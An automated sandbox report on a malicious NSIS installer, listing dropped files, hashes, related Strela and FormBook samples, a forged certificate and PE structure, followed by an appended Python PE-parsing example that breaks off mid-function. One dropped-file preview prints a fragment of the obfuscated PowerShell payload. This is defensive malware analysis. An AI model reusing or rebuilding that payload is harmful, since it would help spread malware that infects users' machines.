http://www.microsoft.a | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 84.201.210.38 | true | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.microsoft.a | SIHClient.exe, 00000004.00000003.2213230493.0000017F02A68000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2212798692.0000017F02A6B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | Ej86aa7Ki7.exe | false | | high
      No contacted IP infos
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1587855
Start date and time: 2025-01-10 18:39:22 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 42
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Ej86aa7Ki7.exe (renamed because original name is a hash value)
Original Sample Name: 05199e2da28bae00c03632e937ba49adba3bd5c9ef102e14639de784a82eb765.exe
Detection: MAL
Classification: mal68.evad.winEXE@4487/19@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 48
  • Number of non-executed functions: 23
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Override analysis time to 240s for powershell
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
  • Excluded IPs from analysis (whitelisted): 52.149.20.212, 84.201.210.38, 52.165.164.15, 13.95.31.18, 13.107.246.45
  • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed; the report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtWriteVirtualMemory calls found.
Time | Type | Description
12:40:14 | API Interceptor | 1488x Sleep call for process: powershell.exe modified
12:40:29 | API Interceptor | 2x Sleep call for process: SIHClient.exe modified
      No context
Match: default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
2153616741885716229.js | Get hash | malicious | Strela Downloader | Browse | 217.20.57.26
77502473271720630.js | Get hash | malicious | Strela Downloader | Browse | 217.20.57.34
2553416555111621752.js | Get hash | malicious | Strela Downloader | Browse | 84.201.210.18
1495528197325499932.js | Get hash | malicious | Strela Downloader | Browse | 84.201.210.34
31903173511658621632.js | Get hash | malicious | Strela Downloader | Browse | 84.201.210.19
334130052300215064.js | Get hash | malicious | Strela Downloader | Browse | 217.20.57.19
22977297631246330149.js | Get hash | malicious | Strela Downloader | Browse | 217.20.57.36
hy09j7Q8kJ.exe | Get hash | malicious | FormBook | Browse | 217.20.57.35
489131343024428850.js | Get hash | malicious | Strela Downloader | Browse | 217.20.57.34
32474162872806629906.js | Get hash | malicious | Strela Downloader | Browse | 84.201.210.39
      Process:C:\Windows\System32\SIHClient.exe
      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
      Category:dropped
      Size (bytes):4761
      Entropy (8bit):7.945585251880973
      Encrypted:false
      SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
      MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
      SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
      SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
      SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
      Malicious:false
      Process:C:\Windows\System32\SIHClient.exe
      File Type:data
      Category:dropped
      Size (bytes):340
      Entropy (8bit):3.137857554099262
      Encrypted:false
      SSDEEP:6:kK82C5+7DYUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:tILkPlE99SCQl2DUeXJlOA
      MD5:1E1749E25B31B0698DF2A3A7D7D6560C
      SHA1:C94F5CD7D89485D451285113C16FA07B6E2F15DB
      SHA-256:6CA82A5FDEF751143AA5AD0897053B5820DA088034878D03F81BDBB9E25CA119
      SHA-512:4D0711388E48343C27DE0D2DB647292FCDC139A1E11DD992B6659A15EC46A121CFDA1A4ACAAAE1EB93E8873A1158831A8B15B33D62C198FDE61CEC723ABDB8B4
      Malicious:false
      Preview:p...... ........^.p..c..(....................................................... ........~..MG......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:modified
      Size (bytes):53158
      Entropy (8bit):5.062687652912555
      Encrypted:false
      SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
      MD5:5D430F1344CE89737902AEC47C61C930
      SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
      SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
      SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
      Malicious:false
      Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode
      Process:C:\Users\user\Desktop\Ej86aa7Ki7.exe
      File Type:data
      Category:dropped
      Size (bytes):13654653
      Entropy (8bit):0.5213970368694034
      Encrypted:false
      SSDEEP:12288:w103sy1TPJAyut7RakRntw2Wj6ui3xS404I:qh/agnK2WESy
      MD5:C1E85754AF7751D70A273BA829DF134C
      SHA1:0F6D75BF01E63206891B3AFF6DB990718688F90A
      SHA-256:36846B524EA8AEB697D1338067015945EFA7AF2506974A2E577B8980DCED584D
      SHA-512:D61D66DED161B936CC5419FB8E666E789B691CC903ADEE2B165F3B1B9F324BBCF39884B72F47C65B1BDD94220A03E733CE0A64299AC4A297311B7F180F654600
      Malicious:false
      Process:C:\Users\user\Desktop\Ej86aa7Ki7.exe
      File Type:Matlab v4 mat-file (little endian) c, numeric, rows 2930638931, columns 44718, imaginary
      Category:dropped
      Size (bytes):328448
      Entropy (8bit):7.587500236600282
      Encrypted:false
      SSDEEP:6144:/dMm03sy1TPJAwfYptN5GWakUC2aWascPw2WGC6VPYi3/bQkvS40m:l103sy1TPJAyut7RakRntw2Wj6ui3xS0
      MD5:AE4243BF77F415B74C7F2ECC7F9E65C2
      SHA1:2C98B5B8B260F72455B8E336270BF60A70D43B81
      SHA-256:515D68CE7C2BDD5E4511767C4172B14C3D6A76D96ACB67FE94538325A71307B8
      SHA-512:E963411A9F9E5E023F2276A2B2C6A9D59F9276170593BDAD6434B199C4B0467D7C5BF7CF62B6723773412AC527AB8BA743C2A37E137425108B3FEC67F806C4B4
      Malicious:false
      Process:C:\Users\user\Desktop\Ej86aa7Ki7.exe
      File Type:data
      Category:dropped
      Size (bytes):4978097
      Entropy (8bit):0.1587330501431333
      Encrypted:false
      SSDEEP:768:oe1c3080LtMUV9O6Ivcs/3cwrp3F96u4PtAbY6NBQAGuwtNYq5jzP9qy2IccGm5q:Fh7Sx
      MD5:E10E4A4F5E9C6C25F30E6F229F5941F3
      SHA1:0CA6DF1C6FB3497E2A8D74F808CC0F23B3295A1F
      SHA-256:CF6A84E24A1F2104FFC6D00058FE72BC8FAD5A36F982503E1A7F1AAFFBEDCDE9
      SHA-512:B7059A1F3D6D19E465DF570A29CC0B233EBF5EFC1E2C07DDBAC71ADC747E1602326B63E93FFB39F1BBA5D300CF394472EED4E8FD28FEBC0E579964FB0EF136DB
      Malicious:false
      Process:C:\Users\user\Desktop\Ej86aa7Ki7.exe
      File Type:data
      Category:dropped
      Size (bytes):4452491
      Entropy (8bit):0.15755416186137736
      Encrypted:false
      SSDEEP:768:dcQDlfI1V+H0C0cnDtbLdHPWfWYefayfCUel0BcvR+7D6xUtH1W0mtLhIplZAicU:xzpxZ
      MD5:23FBA11F197C3671FEC5F037ED860A34
      SHA1:00268C2C72B421CA022770C859FDA9C87610ED0B
      SHA-256:09192DE63A90EA42794CCD244E51DE7F64EA2B4A59FF371B0DA6DD713DA0CC6A
      SHA-512:B79F022A6FFCD7F697FA3FD878F9920AFB5C39F02F8B7799B5E240A94AE9881B43F2D62F1B26D867A9F71B17F9D71EDD3DE2871825381F679805B38722330DF0
      Malicious:false
      Process:C:\Users\user\Desktop\Ej86aa7Ki7.exe
      File Type:Unicode text, UTF-8 text, with very long lines (4359), with CRLF, LF line terminators
      Category:dropped
      Size (bytes):74068
      Entropy (8bit):5.167802605183943
      Encrypted:false
      SSDEEP:768:K6aeZ2PXwKT0qB7RMiqvQoTqrpQnobwyLscxWEku6U26lEf4kTgHOP3VAEh75Xmc:K6pGgKR0qeobwywgZpEf4fUAEhVXkXFU
      MD5:715FBEC5560F3D80EB426C7894CE9F6E
      SHA1:0C0D5307F81989998E7CA0B72BE4790F8177F6C6
      SHA-256:310BCE61CC19865538CC2C47A05D52F51453A914463CF4AAD37B41BFB8C9FCEF
      SHA-512:6C5B3A1249891EDFA4F0A9C98200AA510987190C2C2C812F7A09E26F39F0935A7688069AD168D0949FFBC725227D503E53945EAFC2AC36D9348EAB4E01D660E7
      Malicious:true
      Preview:$Wisecrackers=$Latices;........$Aandelyds = @'.Fissern.Syntact$LighedsT OverspiStagninpL.vregip TotaleeChoristlLaquea aFreddisd Envenos Thorshr As,rosrGnost ceLivsvarsVedstaatTorneroeTrykpr eEdriast=Enlig.t$DigteriT Avi udiAandsfopUrmennep RumpereRindekrlNonconsa Kldebod .elgnis Overm fTrefoldh CamaldaLremestaModgaaerDehumide akturan omanchd HodogreEks one;Skibsbe.,dressefEpisediuOpf.gninInsensucSulfatitSemperiiBrugerioSpydet nKlatres AntagonUPummelln Erhverc.oomfuleEksilrenLadlefutexpressrWoozie ioutsavocMenighe Cinemat(Evol ti$UdslageT ud.angiSpithampshallowpComanageHjulpislNymphetaStrepitdChecklisO trick,Fodtuds$ EtagerTSvvef yoOutsavonCoalsa.gSlaaskauGlovemaeHjarnsds MuseumhLeverano insoldtrariora)Waterfl Ketenst{Pistole.Re tifi.Predest$ CteletMhydrochoLandvsed orttns Nontolt Vrel ei Uhensil Skat.llSk vrideHanebaar gas.rt Spanked(FirmaomHRawlplueGlobelenGriberwfBenz,coa nderlirBitmnsteIndeksen Dobbel tjekkos'Gle nsaAManualinLoplukkdCaddiceeSkewbacsIndirublMicroclaHypodor$DetribaK
      Process:C:\Users\user\Desktop\Ej86aa7Ki7.exe
      File Type:ASCII text, with very long lines (395), with CRLF line terminators
      Category:dropped
      Size (bytes):539
      Entropy (8bit):4.247606033101229
      Encrypted:false
      SSDEEP:12:qHRqobbnuuNQHpX2gBsLD0kcc+W8R2JT+JPrwIAu4HoW/Q3It:qxqobbnuuNQHpagkF8wUSBrIoQ4t
      MD5:D11C07A55FF09B0A2E0C9BCF181DD969
      SHA1:621D61F1A8F8574548334E4F732B04410E1A964D
      SHA-256:495BFCF071659DDB9BC7783981E1BC6E8FCD2CE81C6C31895D68BF9919B7665E
      SHA-512:54FE8BBBF9FF90F5B0F9CDA6784C3B6AB8FA2D163BDC3FCE39F1FA30ADB3691AF9968DC50AE40DA27F0E18DF952D22040ED9318A88E545672D048B42C94CC3B6
      Malicious:false
      Preview:ankelknoglers udraabstegns hyperhypocrisy constantinian roheryn unendeavored forfdre decks barnet endepunktsjusteringernes masochisms twiniest..unionisation spidsborgernes ukuransnedskrivningerne quiche bizarreriets chirps confessionist.marocain berrugate classicise johannesbrd copart knocks,slagters jarldoemme generalizability rkereaktionre slitteskrues khedive vitilitigate,sojaskraa decimalskilletegn fanebrereder magus echidnidae skarre.missilformularens aftagende recontracting ciffertasterne tydningerne fagstudienvnenes recepturs,
      Process:C:\Users\user\Desktop\Ej86aa7Ki7.exe
      File Type:data
      Category:dropped
      Size (bytes):3811024
      Entropy (8bit):0.15926420403649424
      Encrypted:false
      SSDEEP:768:HG4zGp2v5B9pNmzcIKyHhI8sz7YQcjekdzjECZsTbSmxOR46e5HIcOuWofyVRHXB:t/6
      MD5:6BF42A0A5D506264C42F0A8FF53E718E
      SHA1:8A33E324C152756DA8AA50E351B4C9C92458AB80
      SHA-256:D8F4ECA0C0A30915ED44DB12CE1F356D3532E71E324B2B86FB71A61630FF16B7
      SHA-512:5C1E92EA9CCAF82777A384CA868C319DD3400A910934F6B606FCC4A4E0F1EA6D52027D85169556F021432E0D6346223979D518689DA79A75EE61D046648056B2
      Malicious:false
      Process:C:\Windows\System32\SIHClient.exe
      File Type:data
      Category:dropped
      Size (bytes):12288
      Entropy (8bit):3.171888667447024
      Encrypted:false
      SSDEEP:192:F1TrmEqBI2rJ6S0CaHWdr7boD7EbnZfux:FJrmnBI2rJ6S0CgWdr7cD7EbnZfux
      MD5:4D467BD94C5AB5DECCAF24759A86C8C7
      SHA1:2F39A1B2F4AA86DB63A7CB7EB1CEF81E07D967A5
      SHA-256:2231983DC64DB7DFA27A79E56390D5B31ED8AA39D7CA22D7F651A3A6288A465B
      SHA-512:188D6CA2A66E5CC13E23DABFB6F1D813DA5E8DC8E7BF7313DAE5AD0241356EFE012590DFBDBEDD8AE35630A766BAB2100F03386359D42F9F791C0E253243FF07
      Malicious:false
      Process:C:\Windows\System32\SIHClient.exe
      File Type:Microsoft Cabinet archive data, single, 462 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 31944, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
      Category:dropped
      Size (bytes):17126
      Entropy (8bit):7.3117215578334935
      Encrypted:false
      SSDEEP:192:D5X8WyNHDHFzqDHt8AxL5TKG+tJSdqnajapCNjFZYECUqY7oX9qhnJSdqnaja2Sl:qDlsHq4ThPdlmY9CUiqOdlm2W
      MD5:1B6460EE0273E97C251F7A67F49ACDB4
      SHA1:4A3FDFBB1865C3DAED996BDB5C634AA5164ABBB8
      SHA-256:3158032BAC1A6D278CCC2B7D91E2FBC9F01BEABF9C75D500A7F161E69F2C5F4A
      SHA-512:3D256D8AC917C6733BAB7CC4537A17D37810EFD690BCA0FA361CF44583476121C9BCCCD9C53994AE05E9F9DFF94FFAD1BB30C0F7AFF6DF68F73411703E3DF88A
      Malicious:false
      Process:C:\Windows\System32\SIHClient.exe
      File Type:Microsoft Cabinet archive data, single, 7826 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 53283, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
      Category:dropped
      Size (bytes):24490
      Entropy (8bit):7.629144636744632
      Encrypted:false
      SSDEEP:384:iarwQcY8StpA7IQ6GCq30XPSIleI7lzCuqvfiSIleIx:iartHA7PCFP66Tqvfi6c
      MD5:ACD24F781C0C8F48A0BD86A0E9F2A154
      SHA1:93B2F4FBF96D15BE0766181AFACDB9FD9DD1B323
      SHA-256:5C0A296B3574D170D69C90B092611646FE8991B8D103D412499DBE7BFDCCCC49
      SHA-512:7B1D821CF1210947344FCF0F9C4927B42271669015DEA1C179B2BEAD9025941138C139C22C068CBD7219B853C80FA01A04E26790D8D76A38FB8BEBE20E0A2A4A
      Malicious:false
      Process:C:\Windows\System32\SIHClient.exe
      File Type:Microsoft Cabinet archive data, single, 858 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 12183, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
      Category:modified
      Size (bytes):19826
      Entropy (8bit):7.454351722487538
      Encrypted:false
      SSDEEP:384:3j+naF6zsHqnltHNsAR9zCfsOCUPTNbZR9zOzD8K:z1F6JLts89zIdrFT9zwoK
      MD5:455385A0D5098033A4C17F7B85593E6A
      SHA1:E94CC93C84E9A3A99CAD3C2BD01BFD8829A3BCD6
      SHA-256:2798430E34DF443265228B6F510FC0CFAC333100194289ED0488D1D62C5367A7
      SHA-512:104FA2DAD10520D46EB537786868515683752665757824068383DC4B9C03121B79D9F519D8842878DB02C9630D1DFE2BBC6E4D7B08AFC820E813C250B735621A
      Malicious:false
      Process:C:\Windows\System32\SIHClient.exe
      File Type:Microsoft Cabinet archive data, single, 11149 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 18779, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
      Category:dropped
      Size (bytes):30005
      Entropy (8bit):7.7369400192915085
      Encrypted:false
      SSDEEP:768:ouCAyCeQ8fkZdfTGo/its89z8gjP69zA4:Aqf56z8HzT
      MD5:4D7FE667BCB647FE9F2DA6FC8B95BDAE
      SHA1:B4B20C75C9AC2AD00D131E387BCB839F6FAAABCA
      SHA-256:BE273EA75322249FBF58C9CAD3C8DA5A70811837EF9064733E4F5FF1969D4078
      SHA-512:DDB8569A5A5F9AD3CCB990B0A723B64CEE4D49FA6515A8E5C029C1B9E2801F59259A0FC401E27372C133952E4C4840521419EF75895260FA22DFF91E0BE09C02
      Malicious:false
      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
      Entropy (8bit):7.776667616204929
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:Ej86aa7Ki7.exe
      File size:840'408 bytes
      MD5:cc768b964d98fa2d0cf4d9089176c6b9
      SHA1:5150a1c337194f1d224cc71a5487c398c12e94f6
      SHA256:05199e2da28bae00c03632e937ba49adba3bd5c9ef102e14639de784a82eb765
      SHA512:b1611d227a1340a9a46affcf6c09199deaeda2b36f36274682b4e2114c503449b1d193f0aa1ac6783559a954bc57882b3d69e30a3016697958a526ef54447c5a
      SSDEEP:12288:yzpSfLBm0qhwjFvqD/xvA8xq/gWfRprXsaVtyM72Gxq7zwenwy0neWRnWR09z:eSVxqwjdqVH8prTVt5g7TwpXRWW9z
      TLSH:9F0512C2FB008983F5F36F7E5D491F529BA0ACB8D441E61E21E93B5E29F1230D94E685
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L...8.MX.................b...*......J4............@
      Icon Hash:000204191163061d
      Entrypoint:0x40344a
      Entrypoint Section:.text
      Digitally signed:true
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Time Stamp:0x584DCA38 [Sun Dec 11 21:50:48 2016 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:4ea4df5d94204fc550be1874e1b77ea7
      Signature Valid:false
      Signature Issuer:CN=Smadderfuldt, E=Bellatrix@Squirtiness.Bl, O=Smadderfuldt, L=Puyvalador, OU="Pretypifying Wheelsmen ", S=Occitanie, C=FR
      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
      Error Number:-2146762487
Not Before: 19/12/2023 07:16:12
Not After: 18/12/2024 07:16:12
      Subject Chain
      • CN=Smadderfuldt, E=Bellatrix@Squirtiness.Bl, O=Smadderfuldt, L=Puyvalador, OU="Pretypifying Wheelsmen ", S=Occitanie, C=FR
      Version:3
      Thumbprint MD5:EE95DCF96BDCA8ABE95B2C27A3B5DD70
      Thumbprint SHA-1:F15522D6D080DDE32830014E5D517C05A9862FE8
      Thumbprint SHA-256:F28C0559727E645C7F69DF64A9FF09C9E88801DFA9CFE8347ABA2172331272B4
      Serial:098A68503FB53E54AECC6CC65EF8C5BAFDD9D52D
      Instruction
      sub esp, 000002D4h
      push ebx
      push esi
      push edi
      push 00000020h
      pop edi
      xor ebx, ebx
      push 00008001h
      mov dword ptr [esp+14h], ebx
      mov dword ptr [esp+10h], 0040A230h
      mov dword ptr [esp+1Ch], ebx
      call dword ptr [004080B4h]
      call dword ptr [004080B0h]
      cmp ax, 00000006h
      je 00007FB8412F42B3h
      push ebx
      call 00007FB8412F740Ch
      cmp eax, ebx
      je 00007FB8412F42A9h
      push 00000C00h
      call eax
      mov esi, 004082B8h
      push esi
      call 00007FB8412F7386h
      push esi
      call dword ptr [0040815Ch]
      lea esi, dword ptr [esi+eax+01h]
      cmp byte ptr [esi], 00000000h
      jne 00007FB8412F428Ch
      push ebp
      push 00000009h
      call 00007FB8412F73DEh
      push 00000007h
      call 00007FB8412F73D7h
      mov dword ptr [0042A244h], eax
      call dword ptr [0040803Ch]
      push ebx
      call dword ptr [004082A4h]
      mov dword ptr [0042A2F8h], eax
      push ebx
      lea eax, dword ptr [esp+34h]
      push 000002B4h
      push eax
      push ebx
      push 004216E8h
      call dword ptr [00408188h]
      push 0040A384h
      push 00429240h
      call 00007FB8412F6FC0h
      call dword ptr [004080ACh]
      mov ebp, 00435000h
      push eax
      push ebp
      call 00007FB8412F6FAEh
      push ebx
      call dword ptr [00408174h]
      add word ptr [eax], 0000h
      Programming Language:
      • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x50000 | 0x17788 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xccba0 | 0x738 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x61f1 | 0x6200 | 2ce901035717865394b5faeda5b43e0f | False | 0.6656967474489796 | data | 6.477074763411717 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x13a4 | 0x1400 | 4ac891d4ddf58633f14436f9f80ac6b6 | False | 0.4529296875 | data | 5.163001655755973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x20338 | 0x600 | df898dbdc013374b871e011dcd904b20 | False | 0.501953125 | data | 3.9745558434885093 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2b000 | 0x25000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x50000 | 0x17788 | 0x17800 | 9a8320a105424ee3931a3b49e74f1e10 | False | 0.16107047872340424 | data | 3.87775241222699 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Note: .ndata has no raw bytes (its MD5 is the MD5 of the empty string) but reserves 0x25000 bytes of uninitialized memory, and .data maps 0x20338 bytes from only 0x600 raw bytes. The .text/.rdata/.data/.ndata/.rsrc layout is the one NSIS-built installers carry. No section has entropy above 7, so the stub itself is not packed; the obfuscated payload lives in the dropped files, not in these sections.
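How the two header tables above are produced, as an added example (my code, not Joe Sandbox's and not part of the original report): a dependency-free PE32 reader that pulls the data directories and the section table with struct, computes the per-section entropy column, and checks the SECURITY entry the way an analyst would when a report flags an invalid certificate. On this sample that entry is internally consistent (0xccba0 + 0x738 = 840,408 bytes, the reported file size, so the certificate table is the final 1,848 bytes). The input PE is constructed inside the block by build_sample_pe() so the example runs offline; the ZLIB-complexity column is not reproduced because its exact definition is the sandbox's own.

```python
import math
import struct

# Data-directory names in the order the PE optional header stores them
# (the same order the report's directory table uses).
DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]
SECURITY_INDEX = DIRECTORY_NAMES.index("SECURITY")


def shannon_entropy(buf: bytes) -> float:
    """Entropy in bits per byte: 0.0 for empty or constant input, 8.0 for uniform bytes."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes) -> dict:
    """Read the PE32 data directories and section table without pefile."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    num_dirs = struct.unpack_from("<I", data, opt + 92)[0]      # NumberOfRvaAndSizes
    directories = {}
    for i in range(min(num_dirs, 16)):
        va, size = struct.unpack_from("<II", data, opt + 96 + 8 * i)
        directories[DIRECTORY_NAMES[i]] = (va, size)
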